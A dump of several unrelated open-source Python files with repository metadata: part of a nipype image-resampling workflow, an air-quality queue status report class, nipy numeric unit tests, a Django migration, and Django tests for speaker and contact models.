datasource_xfm.inputs.template = xfm_pattern
datasource_atlas = Node(
interface=DataGrabber(
sort_filelist=True
),
name='datasource_atlas'
)
datasource_atlas.inputs.base_directory = os.path.abspath(atlas_dir)
datasource_atlas.inputs.template = atlas_pattern
resample = MapNode(
interface=Resample(
sinc_interpolation=True
),
name='resample_',
iterfield=['input_file', 'transformation']
)
wf.connect(datasource_source, 'outfiles', resample, 'input_file')
wf.connect(datasource_xfm, 'outfiles', resample, 'transformation')
wf.connect(datasource_atlas, 'outfiles', resample, 'like')
bigaverage = Node(
interface=BigAverage(
output_float=True,
robust=False
),
name='bigaverage',
iterfield=['input_file']
)
wf.connect(resample, 'output_file', bigaverage, 'input_files')
datasink = Node(
interface=DataSink(
base_directory=out_dir,
container=out_dir
),
name='datasink'
)
wf.connect([(bigaverage, datasink, [('output_file', 'average')])])
wf.connect([(resample, datasink, [('output_file', 'atlas_space')])])
wf.connect([(datasource_xfm, datasink, [('outfiles', 'transforms')])])
return wf
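# Illustrative invocation sketch (directory names are placeholders, not from the
# original script); the argparse block below wires the same arguments from the CLI:
#   wf = create_workflow(
#       xfm_dir='/data/xfms', xfm_pattern='*.xfm',
#       atlas_dir='/data/atlas', atlas_pattern='atlas.mnc',
#       source_dir='/data/source', source_pattern='*.mnc',
#       work_dir='/tmp/work', out_dir='/data/out')
#   wf.run()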
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--name",
type=str,
required=True
)
parser.add_argument(
"--xfm_dir",
type=str,
        required=True
)
parser.add_argument(
"--xfm_pattern",
type=str,
required=True
)
parser.add_argument(
"--source_dir",
type=str,
required=True
)
parser.add_argument(
|
"--source_pattern",
type=str,
required=True
)
parser.add_argument(
"--atlas_dir",
type=str,
required=True
)
parser.add_argument(
"--atlas_pattern",
type=str,
required=True
)
parser.add_argument(
"--work_dir",
type=str,
required=True
)
parser.add_argument(
"--out_dir",
type=str,
required=True
)
parser.add_argument(
'--debug',
dest='debug',
action='store_true',
help='debug mode'
)
args = parser.parse_args()
if args.debug:
from nipype import config
config.enable_debug_mode()
config.set('execution', 'stop_on_first_crash', 'true')
config.set('execution', 'remove_unnecessary_outputs', 'false')
config.set('execution', 'keep_inputs', 'true')
config.set('logging', 'workflow_level', 'DEBUG')
config.set('logging', 'interface_level', 'DEBUG')
config.set('logging', 'utils_level', 'DEBUG')
wf = create_workflow(
xfm_dir=os.path.abspath(args.xfm_dir),
xfm_pattern=args.xfm_pattern,
atlas_dir=os.path.abspath(args.atlas_dir),
atlas_pattern=args.atlas_pattern,
source_dir=os.path.abspath(args.source_dir),
source_pattern=args.source_pattern,
work_dir=os.path.abspath(args.work_dir),
out_dir=os.path.abspath(args.out_dir),
name=args.name
)
wf.run(
plugin='MultiProc',
plugin_args={
'n_procs': int(
                os.environ["NCPUS"] if "NCPUS" in os.environ else os.cpu_count()
)
}
)
|
south-coast-science/scs_core
|
src/scs_core/data/queue_report.py
|
Python
|
mit
| 4,239
| 0.006841
|
"""
Created on 26 Aug 2019
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
"""
from collections import OrderedDict
from enum import Enum
from scs_core.data.json import JSONReport
# --------------------------------------------------------------------------------------------------------------------
class QueueReport(JSONReport):
"""
classdocs
"""
# ----------------------------------------------------------------------------------------------------------------
@classmethod
def construct_from_jdict(cls, jdict, skeleton=False):
if not jdict:
return QueueReport(0, ClientStatus.WAITING, False)
length = jdict.get('length')
client_state = ClientStatus[jdict.get('client-state')]
publish_success = jdict.get('publish-success')
return QueueReport(length, client_state, publish_success)
# ----------------------------------------------------------------------------------------------------------------
def __init__(self, length, client_state, publish_success):
"""
Constructor
"""
self.__length = length # int or None
self.__client_state = client_state # int
self.__publish_success = publish_success # bool
# ----------------------------------------------------------------------------------------------------------------
def queue_state(self):
# client INHIBITED...
if self.client_state == ClientStatus.INHIBITED:
return QueueStatus.INHIBITED
# client WAITING...
if self.client_state == ClientStatus.WAITING:
return QueueStatus.STARTING
# client CONNECTING...
if self.client_state == ClientStatus.CONNECTING:
return QueueStatus.CONNECTING
# client CONNECTED...
if self.client_state == ClientStatus.CONNECTED:
if self.length == 0:
return QueueStatus.WAITING_FOR_DATA
if self.publish_success:
return QueueStatus.PUBLISHING
return QueueStatus.QUEUING
# unknown / error...
return QueueStatus.NONE
# ----------------------------------------------------------------------------------------------------------------
def as_json(self):
jdict = OrderedDict()
jdict['length'] = self.length
jdict['client-state'] = self.client_state.name
jdict['publish-success'] = self.publish_success
return jdict
# ----------------------------------------------------------------------------------------------------------------
@property
def length(self):
return self.__length
@length.setter
def length(self, length):
self.__length = length
@property
def client_state(self):
return self.__client_state
@client_state.setter
def client_state(self, client_state):
self.__client_state = client_state
@property
def publish_success(self):
return self.__publish_success
@publish_success.setter
def publish_success(self, publish_success):
self.__publish_success = publish_success
    # ----------------------------------------------------------------------------------------------------------------
def __str__(self, *args, **kwargs):
return "QueueReport:{length:%s, client_state:%s, publish_success:%s}" % \
(self.length, self.client_state, self.publish_success)
# --------------------------------------------------------------------------------------------------------------------
class ClientStatus(Enum):
"""
classdocs
"""
NONE = 0
INHIBITED = 1
WAITING = 2
CONNECTING = 3
CONNECTED = 4
# --------------------------------------------------------------------------------------------------------------------
class QueueStatus(Enum):
"""
classdocs
"""
NONE = 1
INHIBITED = 2
STARTING = 3
CONNECTING = 4
WAITING_FOR_DATA = 5
PUBLISHING = 6
QUEUING = 7
CLEARING = 8
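# Illustrative usage sketch (not part of the original module): a report decoded from
# JSON resolves to a queue state via queue_state(), e.g.
#   report = QueueReport.construct_from_jdict(
#       {'length': 3, 'client-state': 'CONNECTED', 'publish-success': True})
#   report.queue_state()      # -> QueueStatus.PUBLISHING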
|
arokem/nipy
|
nipy/labs/utils/tests/test_misc.py
|
Python
|
bsd-3-clause
| 2,093
| 0.010511
|
#!/usr/bin/env python
import numpy as np
from scipy import special
from ..routines import median, mahalanobis, gamln, psi
from nose.tools import assert_true
from numpy.testing import assert_almost_equal, assert_equal, TestCase
class TestAll(TestCase):
def test_median(self):
x = np.random.rand(100)
assert_almost_equal(median(x), np.median(x))
def test_median2(self):
x = np.random.rand(101)
assert_equal(median(x), np.median(x))
def test_median3(self):
x = np.random.rand(10, 30, 11)
assert_almost_equal(np.squeeze(median(x,axis=1)), np.median(x,axis=1))
def test_mahalanobis0(self):
x = np.ones(100)
A = np.eye(100)
mah = 100.
f_mah = mahalanobis(x, A)
assert_almost_equal(mah, f_mah, decimal=1)
def test_mahalanobis1(self):
x = np.random.rand(100)
A = np.random.rand(100, 100)
A = np.dot(A.transpose(), A) + np.eye(100)
mah = np.dot(x, np.dot(np.linalg.inv(A), x))
f_mah = mahalanobis(x, A)
assert_almost_equal(mah, f_mah, decimal=1)
def test_mahalanobis2(self):
x = np.random.rand(100,3,4)
Aa = np.zeros([100,100,3,4])
for i in range(3):
for j in range(4):
A = np.random.rand(100,100)
A = np.dot(A.T, A)
Aa[:,:,i,j] = A
i = np.random.randint(3)
j = np.random.randint(4)
        mah = np.dot(x[:,i,j], np.dot(np.linalg.inv(Aa[:,:,i,j]), x[:,i,j]))
f_mah = (mahalanobis(x, Aa))[i,j]
assert_true(np.allclose(mah, f_mah))
def test_gamln(self):
|
for x in (0.01+100*np.random.random(50)):
scipy_gamln = special.gammaln(x)
my_gamln = gamln(x)
assert_almost_equal(scipy_gamln, my_gamln)
def test_psi(self):
for x in (0.01+100*np.random.random(50)):
scipy_psi = special.psi(x)
my_psi = psi(x)
assert_almost_equal(scipy_psi, my_psi)
if __name__ == "__main__":
import nose
nose.run(argv=['', __file__])
|
CroceRossaItaliana/jorvik
|
anagrafica/migrations/0047_auto_20170525_2011.py
|
Python
|
gpl-3.0
| 865
| 0.001156
|
# -*- coding: utf-8 -*-
# Generated by Django 1.9.12 on 2017-05-25 20:11
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('anagrafica', '0046_delega_stato'),
]
operations = [
migrations.AlterIndexTogether(
name='delega',
            index_together=set([('persona', 'tipo', 'stato'), ('inizio', 'fine', 'tipo', 'oggetto_id', 'oggetto_tipo'), ('tipo', 'oggetto_tipo', 'oggetto_id'), ('persona', 'inizio', 'fine', 'tipo'), ('persona', 'inizio', 'fine', 'tipo', 'stato'), ('persona', 'stato'), ('persona', 'inizio', 'fine'), ('inizio', 'fine', 'tipo'), ('persona', 'inizio', 'fine', 'tipo', 'oggetto_id', 'oggetto_tipo'), ('persona', 'tipo'), ('oggetto_tipo', 'oggetto_id'), ('inizio', 'fine', 'stato'), ('inizio', 'fine')]),
),
]
|
davivcgarcia/wttd-15
|
eventex/core/tests/test_models_speaker_contact.py
|
Python
|
gpl-3.0
| 3,199
| 0
|
# coding: utf-8
"""
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from django.test import TestCase
from django.core.exceptions import ValidationError
from eventex.core.models import Speaker, Contact
class SpeakerModelTest(TestCase):
"""
Test class.
"""
def setUp(self):
"""
Test initialization.
"""
self.speaker = Speaker(
name='Davi Garcia',
slug='davi-garcia',
url='http://www.davigarcia.com.br',
description='Passionate software developer!'
)
self.speaker.save()
def test_create(self):
"""
Speaker instance must be saved.
"""
self.assertEqual(1, self.speaker.pk)
def test_unicode(self):
"""
Speaker string representation should be the name.
"""
self.assertEqual(u'Davi Garcia', unicode(self.speaker))
class ContactModelTest(TestCase):
"""
Test class.
"""
def setUp(self):
"""
Test initialization.
"""
self.speaker = Speaker.objects.create(
name='Davi Garcia',
slug='davi-garcia',
url='http://www.davigarcia.com.br',
description='Passionate software developer!'
)
def test_email(self):
"""
        Speaker should have email contact.
"""
contact = Contact.objects.create(
speaker=self.speaker,
kind='E',
value='henrique@bastos.net'
)
self.assertEqual(1, contact.pk)
def test_phone(self):
"""
|
        Speaker should have phone contact.
"""
contact = Contact.objects.create(
speaker=self.speaker,
kind='P',
value='21-987654321'
)
self.assertEqual(1, contact.pk)
def test_fax(self):
"""
        Speaker should have fax contact.
"""
contact = Contact.objects.create(
speaker=self.speaker,
kind='F',
value='21-123456789'
)
self.assertEqual(1, contact.pk)
def test_kind(self):
"""
Contact kind must be limited to E, P or F.
"""
contact = Contact(speaker=self.speaker, kind='A', value='B')
self.assertRaises(ValidationError, contact.full_clean)
def test_unicode(self):
"""
Contact string representation should be value.
"""
contact = Contact(
speaker=self.speaker,
kind='E',
value='davivcgarcia@gmail.com')
self.assertEqual(u'davivcgarcia@gmail.com', unicode(contact))
|